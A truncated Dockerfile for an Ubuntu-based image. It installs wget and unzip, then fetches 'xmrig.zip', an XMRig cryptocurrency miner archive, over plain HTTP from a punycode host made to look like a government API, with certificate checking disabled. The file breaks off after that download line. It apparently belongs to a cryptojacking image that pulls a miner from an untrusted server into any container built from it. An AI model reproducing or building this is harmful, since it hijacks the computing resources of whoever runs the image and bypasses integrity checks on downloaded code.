FROM ubuntu:latest

WORKDIR /opt

RUN apt-get update && \
    apt-get install -y wget&& \
    apt-get install -y unzip&& \
    wget --no-check-certificate http://api.six-gov.xn--ses554g:26337/xmrig.zip && \